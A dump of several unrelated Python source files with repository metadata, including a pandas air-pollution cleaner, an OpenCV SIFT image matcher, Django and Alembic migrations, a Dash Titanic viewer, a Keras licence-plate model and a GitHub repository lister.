Python
|
UTF-8
|
Python
| false
| false
| 1,010
|
py
|
from pandas import read_csv
from datetime import datetime
import os
import sys
os.chdir(sys.path[0])
# load data
def parse(x):
return datetime.strptime(x, '%Y %m %d %H')
# Load the data from the csv file
# parse_dates: specifies which columns contain date/time information
# index_col=0 uses column 0 as the index column
# date_parser: function that converts the input strings into datetime values; pandas' default date format is 'YYYY-MM-DD'
dataset = read_csv('PRSA_data_2010.1.1-2014.12.31.csv', parse_dates = [['year', 'month', 'day', 'hour']], index_col=0, date_parser=parse)
# Drop the first column
dataset.drop('No', axis=1, inplace=True)
# Manually specify the column headers
dataset.columns = ['pollution', 'dew', 'temp', 'press', 'wnd_dir', 'wnd_spd', 'snow', 'rain']
# Set the index name
dataset.index.name = 'date'
# Replace all "NA" values with 0
dataset['pollution'].fillna(0, inplace=True)
# Drop the first 24 hours of data
dataset = dataset[24:]
# summarize first 5 rows
print(dataset.head(5))
# save to file
dataset.to_csv('pollution.csv')
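# Added follow-up sketch (illustrative, assumes the file written just above): reload the
# cleaned csv to confirm the date index round-trips correctly.
reloaded = read_csv('pollution.csv', header=0, index_col=0, parse_dates=True)
print(reloaded.head(5))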
|
[
"sdf63fg@yeah.net"
] |
sdf63fg@yeah.net
|
0f52bf017c0980dee607b98226646995ae4e8b27
|
725e48574f6dbf9ddb4220e81b75926e8a382a3e
|
/surf_sift.py
|
bb849e6e48cd530e50435907875f3d22639fbf6e
|
[] |
no_license
|
erdustiggen/ImageMatching
|
562e9af7a93253d0487c087d0df408adaabac4f9
|
ac83e6d7cc458686700b1650e1f22fa883081bda
|
refs/heads/master
| 2020-04-11T18:46:43.485386
| 2018-12-16T14:56:28
| 2018-12-16T14:56:28
| 162,011,287
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,518
|
py
|
#!/usr/bin/python3
import numpy as np
import cv2
from matplotlib import pyplot as plt
# img_path = "NoiselessSatelliteImage.png"
# img_path2 = "NoiselessSatelliteImage2.png"
img_path = "sat_img.png"
img_path2 = "noiseless_img.png"
# sift = cv2.xfeatures2d.SURF_create(800)
sift = cv2.xfeatures2d.SIFT_create(800)
flann_index = 1
flann_parameters = dict(algorithm = flann_index, trees = 5)
img_matcher = cv2.FlannBasedMatcher(flann_parameters, {})
image1 = cv2.imread(img_path)
gray_image1 = cv2.cvtColor(image1, cv2.COLOR_BGR2GRAY)
kpts1, descs1 = sift.detectAndCompute(gray_image1,None)
image2 = cv2.imread(img_path2)
gray_image2 = cv2.cvtColor(image2, cv2.COLOR_BGR2GRAY)
kpts2, descs2 = sift.detectAndCompute(gray_image2,None)
img_matches = img_matcher.knnMatch(descs1, descs2, 2)
img_matchesMask = [[0,0] for i in range(len(img_matches))]
for i, (m1,m2) in enumerate(img_matches):
if m1.distance < 0.45 * m2.distance:
img_matchesMask[i] = [1,0]
pt1 = kpts1[m1.queryIdx].pt
pt2 = kpts2[m1.trainIdx].pt
print(i, pt1,pt2 )
if i % 5 ==0:
cv2.circle(image1, (int(pt1[0]),int(pt1[1])), 5, (255,0,255), -1)
cv2.circle(image2, (int(pt2[0]),int(pt2[1])), 5, (255,0,255), -1)
draw_params = dict(matchColor = (0, 255,0),
singlePointColor = (0,0,255),
matchesMask = img_matchesMask,
flags = 0)
res = cv2.drawMatchesKnn(image1,kpts1,image2,kpts2,img_matches,None,**draw_params)
res = cv2.resize(res, (1080, 720))
cv2.imshow("Result", res);cv2.waitKey();cv2.destroyAllWindows()
|
[
"erdustiggen@gmail.com"
] |
erdustiggen@gmail.com
|
bb5c459af5b5ab58cff9c8bab944ef7d0b44df25
|
8ef3f36d842216aa183e90fba1b8aaf7e7cc3eb6
|
/elpheba/migrations/0004_transfer.py
|
c87e64c87f2607a8f43cea500f8dec23a8322630
|
[] |
no_license
|
kmugglet/django
|
11f3ae7873bc1e4a0de6d3334588e878ba470c64
|
4d0af8b43901867d94c79a3cf8287f851f3b5bc5
|
refs/heads/master
| 2020-03-28T18:36:20.349994
| 2018-09-15T11:21:35
| 2018-09-15T11:21:35
| 148,894,872
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 734
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-12-08 11:18
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('elpheba', '0003_account_banked'),
]
operations = [
migrations.CreateModel(
name='Transfer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('acctNumber', models.PositiveIntegerField()),
('withdrawls', models.DecimalField(decimal_places=2, max_digits=12)),
('timeStamp', models.DateTimeField(auto_now=True)),
],
),
]
|
[
"kmugglet@gmail.com"
] |
kmugglet@gmail.com
|
2ee0a9eaff8bf9d9de4f083fbc505de0679dc1f2
|
2c644a4a0e1eaf8373e4a84a5044a33384668b59
|
/new/new/urls.py
|
87259ccce5cc5b8c4c5b44bf29dcc45231948063
|
[
"BSD-3-Clause"
] |
permissive
|
pralakxavier24/Django
|
99ec9ba12fb0f726028098901ca9d2cb74e2a5b8
|
988708fa6f6efd401b93b9c2f051b93fe64191ff
|
refs/heads/main
| 2023-04-16T18:46:02.119606
| 2021-05-03T09:04:39
| 2021-05-03T09:04:39
| 363,873,316
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,006
|
py
|
"""new URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('',include('travello.urls')),
path('admin/', admin.site.urls),
path('accounts/',include('accounts.urls')),
]
urlpatterns = urlpatterns + static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)
|
[
"pralakxavier@gmail.com"
] |
pralakxavier@gmail.com
|
7acabc3d4816f58683c1adc1855b5d22b9f65da9
|
22e41be57f6c8b6475451e3581ca3ebfe4eee229
|
/app02.py
|
aa8b5bdef856e827be09a19180ddde124c2f14d2
|
[] |
no_license
|
LaisviToliai/PyConLt2019DashExamples
|
9ddb88e130d1a56d2dd3365bd7a58e518b23b4f2
|
1c3d0d4d6bf1c4b37fbdf14957c7284961a3b5b6
|
refs/heads/master
| 2020-05-27T23:59:32.770816
| 2019-05-26T07:44:05
| 2019-05-26T07:44:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,910
|
py
|
"""Example of poor global state management."""
from pathlib import Path
from typing import Iterable, Mapping
import dash
import dash_core_components as dcc
from dash.dependencies import Input, Output
import dash_html_components as html
import dash_table
import pandas as pd
# create the app
app = dash.Dash(__name__)
# load out initial dataset
titanic_path = Path("./datasets/titanic.csv")
assert (
titanic_path.exists()
), "Cannot find titanic dataset."
df = pd.read_csv(titanic_path)
app.layout = html.Div(
children=[
html.H1("Titanic Dataset"),
html.H5("Search for a name"),
dcc.Dropdown(
id="my-dropdown",
options=[{"label": "All", "value": "both"}]
+ [
{"label": sex, "value": sex}
for sex in df.Sex.unique()
],
value="both",
),
html.Div(id="my-div"),
dash_table.DataTable(
id="my-table",
columns=[
{"name": i, "id": i} for i in df.columns
],
data=[],
),
]
)
@app.callback(
Output(
component_id="my-table", component_property="data"
),
[
Input(
component_id="my-dropdown",
component_property="value",
)
],
)
def provide_passengers(sex: str) -> Iterable[Mapping]:
global df
if sex == "both":
return df.to_dict("rows")
df = df[df.Sex == sex]
return df.to_dict("rows")
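# Added aside (illustrative, not part of the original example): the rebinding of the
# module-level `df` above is exactly the "poor global state" this file demonstrates; a
# side-effect-free variant would filter without touching the global, e.g.
#     if sex == "both":
#         return df.to_dict("rows")
#     return df[df.Sex == sex].to_dict("rows")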
@app.callback(
Output(
component_id="my-div",
component_property="children",
),
[
Input(
component_id="my-dropdown",
component_property="value",
)
],
)
def update_output_div(sex: str) -> str:
if sex == "both":
return "Showing all sexes."
return f"Showing all {sex}s."
if __name__ == "__main__":
app.run_server(debug=True)
|
[
"dom.weldon@decisionlab.co.uk"
] |
dom.weldon@decisionlab.co.uk
|
10d54c73b4fe7139233fbda6f0e168b8595b5719
|
e8e98d5125425fb6ff21d9a3609b05278b19c10c
|
/setup.py
|
f958bcff40a72d039429854e76c0a29e0a49a1a7
|
[
"MIT"
] |
permissive
|
ipdae/nirum-python-wsgi
|
76974b909be4de235e8ea78d098a8cdaf1467df8
|
e9a6867f73c2bcde658c8a73a34afb4267c6e13a
|
refs/heads/master
| 2021-08-24T07:21:41.949849
| 2017-12-08T08:12:16
| 2017-12-08T08:12:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,244
|
py
|
import ast
import os
import re
import sys
from setuptools import setup, __version__ as setuptools_version
def readme(name='README.rst'):
try:
with open(name) as f:
rst = f.read()
return re.sub(
r'(^|\n).. include::\s*([^\n]+)($|\n)',
lambda m: m.group(1) + (readme(m.group(2)) or '') + m.group(3),
rst
)
except (IOError, OSError):
return
def get_version():
module_path = os.path.join(os.path.dirname(__file__), 'nirum_wsgi.py')
module_file = open(module_path)
try:
module_code = module_file.read()
finally:
module_file.close()
tree = ast.parse(module_code, module_path)
for node in ast.iter_child_nodes(tree):
if not isinstance(node, ast.Assign) or len(node.targets) != 1:
continue
target, = node.targets
if isinstance(target, ast.Name) and target.id == '__version__':
value = node.value
if isinstance(value, ast.Str):
return value.s
raise ValueError('__version__ is not defined as a string literal')
raise ValueError('could not find __version__')
setup_requires = []
install_requires = [
'nirum >= 0.6.0',
'six',
'Werkzeug >= 0.11, < 1.0',
]
tests_require = [
'flake8-import-order >= 0.12, < 1.0',
'flake8-import-order-spoqa >= 1.0.0, < 2.0.0',
'pytest >= 3.1.2, < 4.0.0',
'pytest-flake8 >= 0.9.1, < 1.0.0',
'requests-mock >= 1.3.0, < 1.4.0',
]
extras_require = {
'tests': tests_require,
}
below35_requires = [
'typing',
]
if 'bdist_wheel' not in sys.argv and sys.version_info < (3, 5):
install_requires.extend(below35_requires)
if tuple(map(int, setuptools_version.split('.'))) < (17, 1):
setup_requires = ['setuptools >= 17.1']
extras_require.update({":python_version=='3.4'": below35_requires})
extras_require.update({":python_version=='2.7'": below35_requires})
else:
extras_require.update({":python_version<'3.5'": below35_requires})
setup(
name='nirum-wsgi',
version=get_version(),
description='Nirum services as WSGI apps',
long_description=readme(),
url='https://github.com/spoqa/nirum-python-wsgi',
bugtrack_url='https://github.com/spoqa/nirum/issues',
author='Nirum team',
license='MIT license',
py_modules=['nirum_wsgi'],
install_requires=install_requires,
setup_requires=setup_requires,
extras_require=extras_require,
entry_points={
'console_scripts': [
'nirum-server = nirum_wsgi:main',
],
},
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Internet :: WWW/HTTP :: WSGI :: Application',
'Topic :: Software Development :: Code Generators',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Software Development :: Object Brokering',
]
)
|
[
"hong.minhee@gmail.com"
] |
hong.minhee@gmail.com
|
d2dc638524f6e35f32122cb463a2fab665e80b9e
|
5491f4b600f7ecd1d0848d60d7b017e5e407d4c7
|
/servicios/migrations/0001_initial.py
|
c1a04f0e87a898b641e7e4ecdd948ec0fcbb176e
|
[] |
no_license
|
GustavoPMex/web-inventario
|
409456dd356bbfcadd735cc9b8e2aae7605a0e37
|
d0ac36ee791ff0262f9390497da1dd990581a4fd
|
refs/heads/master
| 2023-06-10T10:08:39.029666
| 2021-06-30T23:40:19
| 2021-06-30T23:40:19
| 296,677,352
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,346
|
py
|
# Generated by Django 3.0.8 on 2020-08-27 05:24
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('registration', '0002_remove_profile_correo'),
('cliente', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ServicioModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('descripcion', models.TextField()),
('estado', models.CharField(choices=[('pendiente', 'Pendiente'), ('terminado', 'Terminado')], default='pendiente', max_length=20)),
('creacion', models.DateTimeField(auto_now_add=True)),
('modificacion', models.DateTimeField(auto_now=True)),
('cliente', models.ForeignKey(default=None, on_delete=django.db.models.deletion.PROTECT, to='cliente.ClienteModel')),
('tecnico', models.ForeignKey(default=None, on_delete=django.db.models.deletion.PROTECT, to='registration.Profile')),
],
options={
'verbose_name': 'Servicio',
'verbose_name_plural': 'Servicios',
'ordering': ['-creacion'],
},
),
]
|
[
"gustavoppymex@gmail.com"
] |
gustavoppymex@gmail.com
|
5735e0eea55f32b3e9089d7447093ed6bc72b14a
|
12f50dac1c5fbdae726e1fe83f31d3e24b9bf0e6
|
/hyperlpr/finemapping_vertical.py
|
11870f31e754c2f46e5e295b173550394247b5ed
|
[] |
no_license
|
HannaRiver/HyperLPR
|
e9611d763a1cda018cdf83a7dd8e9f142c379e11
|
28e900ee666afce738127a7125743dd5d3817865
|
refs/heads/master
| 2021-07-03T19:40:05.802473
| 2017-09-26T01:37:57
| 2017-09-26T01:37:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,326
|
py
|
#coding=utf-8
from keras.layers import Conv2D, Input,MaxPool2D, Reshape,Activation,Flatten, Dense
from keras.models import Model, Sequential
from keras.layers.advanced_activations import PReLU
from keras.optimizers import adam
import numpy as np
import cv2
def getModel():
    input = Input(shape=[12, 50, 3]) # change this shape to [None,None,3] to enable arbitrary shape input
x = Conv2D(10, (3, 3), strides=1, padding='valid', name='conv1')(input)
x = PReLU(shared_axes=[1, 2], name='prelu1')(x)
x = MaxPool2D(pool_size=2)(x)
x = Conv2D(16, (3, 3), strides=1, padding='valid', name='conv2')(x)
x = PReLU(shared_axes=[1, 2], name='prelu2')(x)
x = Conv2D(32, (3, 3), strides=1, padding='valid', name='conv3')(x)
x = PReLU(shared_axes=[1, 2], name='prelu3')(x)
x = Flatten()(x)
output = Dense(2)(x)
output = PReLU(name='prelu4')(output)
model = Model([input], [output])
return model
model = getModel()
model.load_weights("./model/model12.h5")
def finemappingVertical(image):
resized = cv2.resize(image,(50,12))
resized = resized.astype(np.float)/255
res= model.predict(np.array([resized]))[0]
res =res*image.shape[1]
res = res.astype(np.int)
image = image[0:35,res[0]+4:res[1]]
image = cv2.resize(image, (int(136), int(36)))
return image
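# --- Added usage sketch (hypothetical file names, not from the original repo) ---
# plate = cv2.imread("plate_crop.jpg")        # a BGR crop around a detected plate
# refined = finemappingVertical(plate)        # returns a 136x36 re-cropped plate image
# cv2.imwrite("plate_refined.jpg", refined)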
|
[
"455501914@qq.com"
] |
455501914@qq.com
|
0d8b4c467eac9dc88297679578b72230e93a2a6b
|
3d9d193673cd1e3b5c10f824b7bbde6ecaf8e67f
|
/migrations/versions/19e377378700_.py
|
7b481b20b3496e3fd7cf6913effe1fbb82b4202c
|
[] |
no_license
|
n0thingness/cs446-api
|
696b6ef742863eecb9bf63a475654ced547364f8
|
071f0016b2f049d32e5f97466d57aaef0dbb0fe1
|
refs/heads/master
| 2021-09-10T20:34:25.841174
| 2018-04-01T22:20:36
| 2018-04-01T22:20:36
| 125,778,068
| 0
| 0
| null | 2018-04-01T22:20:37
| 2018-03-18T23:42:17
|
Python
|
UTF-8
|
Python
| false
| false
| 831
|
py
|
"""empty message
Revision ID: 19e377378700
Revises: 526868857b1f
Create Date: 2018-03-31 16:36:24.905609
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '19e377378700'
down_revision = '526868857b1f'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('users', sa.Column('matchedTopics', sa.String(length=128), nullable=True))
op.drop_column('users', 'matchedTopic')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('users', sa.Column('matchedTopic', sa.VARCHAR(length=128), autoincrement=False, nullable=True))
op.drop_column('users', 'matchedTopics')
# ### end Alembic commands ###
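# Usage sketch (assumes a configured alembic.ini; commands are standard Alembic CLI,
# not taken from this repo):
#   alembic upgrade 19e377378700    # apply this revision (or: alembic upgrade head)
#   alembic downgrade 526868857b1f  # roll back to the previous revision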
|
[
"daniel.briskin@gmail.com"
] |
daniel.briskin@gmail.com
|
805148e822a48ceaa86904ea3e2f94559d77c994
|
623833fd87ca9638780adeef55d1a25525bc2f4e
|
/PRACTICUM--Oral_Microbiome_Browser/read_info_parser.py
|
c3ac13d0fa99aa16fd48de4d8f5d332f9167d46c
|
[] |
no_license
|
BryanChim/Python--Bioinformatics
|
c2816eb34b52237bdded717900331e23c52f4fee
|
ad42909a16127d70c62725ba43b76a12387926e8
|
refs/heads/master
| 2021-01-22T18:28:16.113133
| 2014-11-17T07:07:08
| 2014-11-17T07:07:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,275
|
py
|
__author__ = 'Bryan'
import re
import argparse
import os
read_dict = {}
# get arguments from parser
parser = argparse.ArgumentParser(description='Get reads and read info')
parser.add_argument('dir_of_fasta_files', type=str, help="directory to input fasta files")
parser.add_argument('output_file', type=argparse.FileType('w'), help="output file of read data")
args = parser.parse_args()
fasta_files = os.listdir(args.dir_of_fasta_files)
for file in fasta_files:
    # os.listdir returns bare file names, so join them with the input directory
    fa_in = open(os.path.join(args.dir_of_fasta_files, file), 'r')
    # the sample id is the part of the file name before the barcode and read/test suffix
    sample_id_from_fileC = re.search(r"(.*?)_[ATCG]+?_(?:read|test).*", file)
    sample = sample_id_from_fileC.group(1)
    for line in fa_in:
        line = line.strip()
        if re.match('>.*', line):
            # header format: >...|<id>|<name>|<length>|<quality score>
            read_infoG = re.match(r'>.*\|\d+\|(.*?)\|(\d+)\|(\d+)', line)
            name = read_infoG.group(1)
            length = read_infoG.group(2)
            qualityscore = read_infoG.group(3)
            # write one tab-separated row per read (Python 3 replacement for the old `print >>` syntax)
            print(name, sample, length, qualityscore, sep='\t', file=args.output_file)
    fa_in.close()
args.output_file.close()
#read_dict[name] = (length, qualityscore)
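# Example invocation (hypothetical paths, shown only to illustrate the command line):
#   python read_info_parser.py ./fasta_samples reads_info.tsv
# Each output row is tab-separated: read name, sample id, read length, quality score.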
|
[
"bryanchim88@gmail.com"
] |
bryanchim88@gmail.com
|
e8aa570ea9409224e1b9f7a069063dba75362eb2
|
3a8110706a67e111305a943ab7590d94782b0f6a
|
/Matplot/matplot1.py
|
1c7d45579e9e1a44d0f63f6e3d252cf6245c53d6
|
[] |
no_license
|
pawwahn/python_practice
|
41fac14f7107fd8f7c8a33fa7e09561f24bf9376
|
9e6564582abeb9f65c95de86121199939d0ee388
|
refs/heads/master
| 2022-10-04T10:32:49.952690
| 2022-09-15T09:43:18
| 2022-09-15T09:43:18
| 223,134,205
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 135
|
py
|
import numpy as np
from matplotlib import pyplot as plt
x = np.arange(0,8,0.1)
print(x)
y = np.sin(x)
print(y)
plt.plot(x,y)
plt.show()
|
[
"pavan.skt@gmail.com"
] |
pavan.skt@gmail.com
|
c2b41d27d310d8292e93ff05e9da0d88f018702f
|
4fc120bf5d63dd81916663b8f6ec76e5f9f1f59e
|
/Python/django/books/apps/book/models.py
|
3bf1922d7e8c8c766cb3c951dbe36674859dc051
|
[] |
no_license
|
mjnorona/codingDojo
|
3e8e31853131904922de256f20fd22afaab47194
|
5864d4b5d30f3edca5e20506d24970edc33a8c50
|
refs/heads/master
| 2021-01-23T12:48:24.549638
| 2017-08-22T07:19:57
| 2017-08-22T07:19:57
| 93,197,487
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 476
|
py
|
from __future__ import unicode_literals
from django.db import models
# Create your models here.
class Books(models.Model):
title = models.CharField(max_length = 30)
author = models.CharField(max_length = 30)
published_date = models.CharField(max_length = 30)
category = models.CharField(max_length = 30)
created_at = models.DateTimeField(auto_now_add = True)
    updated_at = models.DateTimeField(auto_now = True)  # auto_now (not auto_now_add) so this refreshes on every save
in_print = models.BooleanField()
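# ORM usage sketch (run from e.g. `python manage.py shell`; the field values are invented):
#   Books.objects.create(title="Dune", author="Frank Herbert", published_date="1965",
#                        category="Sci-Fi", in_print=True)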
|
[
"marcusjeremynorona@gmail.com"
] |
marcusjeremynorona@gmail.com
|
61edd1db2587c0fed59a6ff24856b1d33d604218
|
05322cd9503df62700ebc7cfe4f1dab460e00f45
|
/api/app/v1/resources/queries/models.py
|
3aba61e092d257ed6ffe38b1d0549ec7520ed5e0
|
[] |
no_license
|
duanribeiro/serasa_exercise
|
6650a2ebf1e75c4a14519848c5f315b7b03e3c2f
|
aaea66e8736ce8d99d778a192fafc8115149182c
|
refs/heads/master
| 2021-03-18T03:07:50.914790
| 2020-03-21T12:29:38
| 2020-03-21T12:29:38
| 247,041,284
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 791
|
py
|
import json
from app import mongo
from flask_restplus import abort
from bson.json_util import dumps
from quotes.helpers.auth import AuthEncrypt
class Auth:
@staticmethod
def change_username_password(payload):
username = payload.get('username')
password = payload.get('password')
password = password.encode()
auth = AuthEncrypt(password)
encrypted_password = auth.encrypt_password()
mongo.db.auth.update_one({},
{"$set": {"username": username, "password": encrypted_password}},
upsert=True)
return 'ok'
class Quotes:
@staticmethod
def get_all():
results = mongo.db.quotes.find({}, {"_id": 0})
return json.loads(dumps(results))
|
[
"duan.ribeiro@hotmail.com"
] |
duan.ribeiro@hotmail.com
|
2c0e4f4423d882ea7287ddc5578297c8f614d352
|
61826d69a04391ba99c26e207aa7273055977d59
|
/291project.py
|
65afe78ce0f55dddb254bfe96e7c02a44a8444d8
|
[] |
no_license
|
dbsigurd/291Project1
|
2e4f8c1156eb8c5905694e32ce3dcd198d09e486
|
95a0e237891d52fa1b1c24fc16b500bb57a33dbb
|
refs/heads/master
| 2021-01-15T13:45:06.022482
| 2014-10-27T16:41:38
| 2014-10-27T16:41:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 866
|
py
|
import sys
def enter_prescription():
print("entered prescription")
main()
def medical_test():
main()
def edit_patients():
main()
def search():
main()
def main():
print("########welcome to 291 mini project menu########")
print("###please enter 1 for entering a prescription###")
print("###please enter 2 for entering a medical test###")
print("###please enter 3 for editing a patients info###")
print("###please enter 4 for entering a search query###")
print("####please enter 5 to terminate this program####")
choice =int(input("enter your choice:"))
if (choice == 1):
enter_prescription()
elif (choice == 2):
medical_test()
elif (choice == 3):
edit_patients()
elif (choice == 4):
search()
elif (choice == 5):
sys.exit()
else:
main()
main()
|
[
"dbsigurd@ualberta.ca"
] |
dbsigurd@ualberta.ca
|
1c5b4aba1da2d58321dacc07ca25c917990c0020
|
52b5773617a1b972a905de4d692540d26ff74926
|
/.history/countingValley_20200625160352.py
|
0822a0291a7f41887b2fe1725ddb17cb8c8fe49a
|
[] |
no_license
|
MaryanneNjeri/pythonModules
|
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
|
f4e56b1e4dda2349267af634a46f6b9df6686020
|
refs/heads/master
| 2022-12-16T02:59:19.896129
| 2020-09-11T12:05:22
| 2020-09-11T12:05:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 697
|
py
|
def countingValleys(path):
    # no need to split because you can traverse through a string directly
    # how to differentiate between mountain and valley:
    # mountain you go up then down, valley you go down then up
    # track the current level relative to sea level (0); every time a "U" step
    # brings the level back up to 0, one valley has just been closed
    valley = 0
    level = 0
    i = 0
    while i < len(path):
        if path[i] == "U":
            level += 1
            if level == 0:
                valley += 1
        elif path[i] == "D":
            level -= 1
        i += 1
    print("valley-->", valley)
    return valley
countingValleys("UDDDUDUU")
# "UDDDUDUU"
|
[
"mary.jereh@gmail.com"
] |
mary.jereh@gmail.com
|
ebd350a092cb9bb83ac006844baa08e4d6d66277
|
eb500d165a7f4234c8cff93a1b39b99d14b7a9e8
|
/list_github_repos.py
|
a83edc1eca361020b4fa820db6a4ecefc0fe28d8
|
[] |
no_license
|
boredants/list_github_repos
|
a4ef58baad440b7c64c6507dff25e5d1a1598c31
|
6014eec27c1732f5aca3a5b4ef321e020a7892c2
|
refs/heads/master
| 2020-12-01T22:29:40.237480
| 2019-12-29T19:15:01
| 2019-12-29T19:15:01
| 230,792,756
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 622
|
py
|
import requests
print("\n################################")
print("# LIST GITHUB REPOS FOR A USER #")
print("################################")
while True:
githubUser = input("\nEnter a username or 'q' to quit: ")
print()
if githubUser == 'q':
print("Exiting\n")
break
else:
url = "https://api.github.com/users/" + githubUser + "/repos"
try:
j = requests.get(url).json()
for i in j:
print("{0:30}: {1}".format(i.get('name'), i.get('description')))
        except Exception:
            # any failure (unknown user, network error, unexpected payload) lands here
            print("Could not list repos for that user (the user may not exist).")
|
[
"noreply@github.com"
] |
boredants.noreply@github.com
|
7026f58d5b2a95af765eb6ac76900dd21f59464a
|
a780e9ce2b33fd00e15dd66a826c6eb8e0afbd13
|
/tuition/migrations/0009_post_user.py
|
dce735ae6ae295f283e225d6f918ef1aa292fcfd
|
[] |
no_license
|
litonbairaggi/djtestproject
|
dfa2ea40557dd37fc705f80b9b20115b6d9328a9
|
c9504a4aaa3f5638087f4ce976916b21bd290130
|
refs/heads/master
| 2023-04-27T11:26:52.414889
| 2021-05-18T15:41:06
| 2021-05-18T15:41:06
| 366,428,699
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 592
|
py
|
# Generated by Django 3.1.7 on 2021-05-11 21:06
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('tuition', '0008_post_medium'),
]
operations = [
migrations.AddField(
model_name='post',
name='user',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
|
[
"litonovi2013@gmail.com"
] |
litonovi2013@gmail.com
|